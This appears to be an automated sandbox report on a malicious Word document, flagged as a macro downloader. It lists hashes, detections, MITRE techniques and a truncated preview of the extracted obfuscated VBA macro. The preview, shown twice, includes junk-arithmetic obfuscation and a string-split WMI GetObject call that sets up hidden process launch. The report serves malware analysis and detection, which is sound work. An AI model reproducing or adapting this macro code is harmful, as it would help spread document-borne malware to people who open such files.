Office (OLE) malware analysis — malicious · a7ef0475fae9d5b4

MALICIOUS

Office (OLE)

310.4 KB Created: 2019-02-19 20:40:00 Authoring application: Microsoft Office Word First seen: 2019-08-04

MD5: e6a094988ef6a85464416d8bf575fa72 SHA-1: e9954630fe560fc349556461f7a23c64d289cc43 SHA-256: a7ef0475fae9d5b4480987867ea65efa7082cb2da48dba2b4d5b672475a2f07c

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing a VBA macro. The macro is triggered by the AutoOpen event and uses GetObject, indicating an attempt to download and execute a second-stage payload. The ClamAV heuristic also flags it as a downloader. The obfuscated nature of the VBA script prevents a more detailed analysis of its specific actions.

Heuristics 7

ClamAV: Doc.Downloader.00536d-6863013-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.00536d-6863013-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
GetObject call high OLE_VBA_GETOBJ

GetObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 55372 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	55372 bytes
SHA-256: `c4e1294e4f41184a865f2b1d5c3648985bc64dd4d68439980177fc041ce70d71`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "t686_23" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "a__4_071" Function V4_960_() If q_546_ <> I_1_7__ Then Q7_9__ = 701470813 + CSng(146828637) * 13586202 * ChrB(96109000) * (E00_599 / CDbl(691025095 + CBool(A963__0 - Int(226317228 / Z1__17 * 871196382 / Cos(D506_23)))) - (H347__ + Oct(481363254) + 113011789 / 172696663)) End If If K61__6_7 <> N993191 Then R__30_64 = 64692881 + CSng(578692896) * 379387962 * ChrB(634968106) * (t___5837 / CDbl(832129842 + CBool(E____30_ - Int(294701623 / Q46_63__ * 244617836 / Cos(o_44____)))) - (D39_7437 + Oct(714578314) + 649762828 / 230443330)) End If If S7954326 <> r_7___8 Then V___85_ = 260390344 + CSng(973764153) * 399475724 * ChrB(739792131) * (k_54_150 / CDbl(54597051 + CBool(i6__993 - Int(237944148 / Q_982_ * 494098103 / Cos(B59218)))) - (I75_6655 + Oct(109470767) + 347894136 / 5529734)) End If If W4__8677 <> Z582_48 Then j__76_ = 874020192 + CSng(496181604) * 657556750 * ChrB(15358458) * (M08681 / CDbl(626295081 + CBool(G78__3 - Int(697120642 / z__13_ * 547765031 / Cos(w0__797)))) - (B044__2 + Oct(491179086) + 485135317 / 319774700)) End If If a6_525 <> Y97_7_72 Then P966_43 = 693709293 + CSng(231633702) * 153172497 * ChrB(534266532) * (D23_6717 / CDbl(805157224 + CBool(q31___ - Int(297114053 / C_402882 * 428378879 / Cos(O9_704)))) - (i9_7_2 + Oct(552420440) + 663567571 / 191300926)) End If If H_9_6_4 <> N8_7487 Then l41995 = 566391186 + CSng(375360027) * 503722413 * ChrB(211428483) * (Q2_99_66 / CDbl(469166473 + CBool(I265_9_ - Int(819780431 / I0_983 * 277971919 / Cos(U16__6)))) - (f021__9_ + Oct(517300280) + 238267555 / 38156000)) End If If J6_8_4 <> r73__3_9 Then s_204282 = 633682142 + CSng(722963510) * 111787245 * ChrB(108496270) * (M66_26 / CDbl(123722445 + CBool(M37181_ - Int(306821415 / t3_283 * 585360384 / Cos(f60_8_88)))) - (c8_46_ + Oct(490162109) + 803388090 / 68676712)) End If End Function Function j6_442_(T61_97_, V__1284_) On Error Resume Next If W80_362_ <> s_0702 Then Z8___99 = 326525044 + CSng(733662102) * 684163206 * ChrB(411026241) * (N440412 / CDbl(367886585 + CBool(i6180_ - Int(230675253 / m_85_0 * 762871673 / Cos(r07618)))) - (U_719_64 + Oct(323993210) + 322732401 / 727638239)) End If If v5798_ <> W2644_3 Then C4689_5 = 520977429 + CSng(114936677) * 645867905 * ChrB(456511223) * (p531___5 / CDbl(357965447 + CBool(R9_63_ - Int(410945636 / j1_095 * 322543093 / Cos(W46295)))) - (I16_40 + Oct(457581538) + 333283385 / 190196315)) End If Set T8_0__ = GetObject((Q54852_9 + "winmgm" + i7_3_80) + (j6206837 + "ts:Win" + T6454_) + "32_Proce" + "ssStartup") If J_9_328 <> l79_7_99 Then i0_524_ = 950307736 + CSng(380891135) * 709487637 * ChrB(237835325) * (o55__9__ / CDbl(994309596 + CBool(z9_9__ - Int(774240038 / B__59787 * 184358792 / Cos(k87_921_)))) - (s05_68 + Oct(508241271) + 125297862 / 25432035)) End If If z_8251 <> J74954 Then z91790_7 = 663463375 + CSng(245199932) * 291820666 * ChrB(598740922) * (w___3_ / CDbl(509389916 + CBool(l3_9_831 - Int(667974032 / G90874_1 * 478329473 / Cos(n8_86072)))) - (F_54012 + Oct(928103046) + 466661151 / 238199702)) End If If c_2001 <> r_88_3_ Then S_750_7 = 451894603 + CSng(842967944) * 56687212 * ChrB(322034940) * (C_7_96 / CDbl(152221836 + CBool(A85485_ - Int(644963124 / f2_3_0__ * 670471075 / Cos(w150_92_)))) - (H4___16 + Oct(436837278) + 94617526 / 676878307)) End If T8_0__.ShowWindow = 95517 - 95517 If P65985 <> d27_323_ Then P6_0_9 = 578324938 + CSng(587359044) * 626967944 * ChrB(715961569) * (J39_429 / CDbl(911867854 + CBool(z_9_57_ - Int(729078707 / p628398 * 750569534 / Cos(j501_546)))) - (L4__71 + Oct(83349916) + 883350524 / 300313035)) End If If i444__ <> s6_118 Then v0__0_ = 963287015 + CSng(143458624) * 8106882 * ChrB(203455458) * (B_211_ / CDbl(499331418 + CBool(v74520 - Int(21034086 ... (truncated)

SHA-256: c4e1294e4f41184a865f2b1d5c3648985bc64dd4d68439980177fc041ce70d71

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "t686_23"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "a__4_071"
Function V4_960_()
   If q_546_ <> I_1_7__ Then
Q7_9__ = 701470813 + CSng(146828637) * 13586202 * ChrB(96109000) * (E00_599 / CDbl(691025095 + CBool(A963__0 - Int(226317228 / Z1__17 * 871196382 / Cos(D506_23)))) - (H347__ + Oct(481363254) + 113011789 / 172696663))
End If
   If K61__6_7 <> N993191 Then
R__30_64 = 64692881 + CSng(578692896) * 379387962 * ChrB(634968106) * (t___5837 / CDbl(832129842 + CBool(E____30_ - Int(294701623 / Q46_63__ * 244617836 / Cos(o_44____)))) - (D39_7437 + Oct(714578314) + 649762828 / 230443330))
End If
   If S7954326 <> r_7___8 Then
V___85_ = 260390344 + CSng(973764153) * 399475724 * ChrB(739792131) * (k_54_150 / CDbl(54597051 + CBool(i6__993 - Int(237944148 / Q_982_ * 494098103 / Cos(B59218)))) - (I75_6655 + Oct(109470767) + 347894136 / 5529734))
End If
   If W4__8677 <> Z582_48 Then
j__76_ = 874020192 + CSng(496181604) * 657556750 * ChrB(15358458) * (M08681 / CDbl(626295081 + CBool(G78__3 - Int(697120642 / z__13_ * 547765031 / Cos(w0__797)))) - (B044__2 + Oct(491179086) + 485135317 / 319774700))
End If
   If a6_525 <> Y97_7_72 Then
P966_43 = 693709293 + CSng(231633702) * 153172497 * ChrB(534266532) * (D23_6717 / CDbl(805157224 + CBool(q31___ - Int(297114053 / C_402882 * 428378879 / Cos(O9_704)))) - (i9_7_2 + Oct(552420440) + 663567571 / 191300926))
End If
   If H_9_6_4 <> N8_7487 Then
l41995 = 566391186 + CSng(375360027) * 503722413 * ChrB(211428483) * (Q2_99_66 / CDbl(469166473 + CBool(I265_9_ - Int(819780431 / I0_983 * 277971919 / Cos(U16__6)))) - (f021__9_ + Oct(517300280) + 238267555 / 38156000))
End If
   If J6_8_4 <> r73__3_9 Then
s_204282 = 633682142 + CSng(722963510) * 111787245 * ChrB(108496270) * (M66_26 / CDbl(123722445 + CBool(M37181_ - Int(306821415 / t3_283 * 585360384 / Cos(f60_8_88)))) - (c8_46_ + Oct(490162109) + 803388090 / 68676712))
End If
End Function
Function j6_442_(T61_97_, V__1284_)
On Error Resume Next
   If W80_362_ <> s_0702 Then
Z8___99 = 326525044 + CSng(733662102) * 684163206 * ChrB(411026241) * (N440412 / CDbl(367886585 + CBool(i6180_ - Int(230675253 / m_85_0 * 762871673 / Cos(r07618)))) - (U_719_64 + Oct(323993210) + 322732401 / 727638239))
End If
   If v5798_ <> W2644_3 Then
C4689_5 = 520977429 + CSng(114936677) * 645867905 * ChrB(456511223) * (p531___5 / CDbl(357965447 + CBool(R9_63_ - Int(410945636 / j1_095 * 322543093 / Cos(W46295)))) - (I16_40 + Oct(457581538) + 333283385 / 190196315))
End If
Set T8_0__ = GetObject((Q54852_9 + "winmgm" + i7_3_80) + (j6206837 + "ts:Win" + T6454_) + "32_Proce" + "ssStartup")
   If J_9_328 <> l79_7_99 Then
i0_524_ = 950307736 + CSng(380891135) * 709487637 * ChrB(237835325) * (o55__9__ / CDbl(994309596 + CBool(z9_9__ - Int(774240038 / B__59787 * 184358792 / Cos(k87_921_)))) - (s05_68 + Oct(508241271) + 125297862 / 25432035))
End If
   If z_8251 <> J74954 Then
z91790_7 = 663463375 + CSng(245199932) * 291820666 * ChrB(598740922) * (w___3_ / CDbl(509389916 + CBool(l3_9_831 - Int(667974032 / G90874_1 * 478329473 / Cos(n8_86072)))) - (F_54012 + Oct(928103046) + 466661151 / 238199702))
End If
   If c_2001 <> r_88_3_ Then
S_750_7 = 451894603 + CSng(842967944) * 56687212 * ChrB(322034940) * (C_7_96 / CDbl(152221836 + CBool(A85485_ - Int(644963124 / f2_3_0__ * 670471075 / Cos(w150_92_)))) - (H4___16 + Oct(436837278) + 94617526 / 676878307))
End If
T8_0__.ShowWindow = 95517 - 95517
   If P65985 <> d27_323_ Then
P6_0_9 = 578324938 + CSng(587359044) * 626967944 * ChrB(715961569) * (J39_429 / CDbl(911867854 + CBool(z_9_57_ - Int(729078707 / p628398 * 750569534 / Cos(j501_546)))) - (L4__71 + Oct(83349916) + 883350524 / 300313035))
End If
   If i444__ <> s6_118 Then
v0__0_ = 963287015 + CSng(143458624) * 8106882 * ChrB(203455458) * (B_211_ / CDbl(499331418 + CBool(v74520 - Int(21034086 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.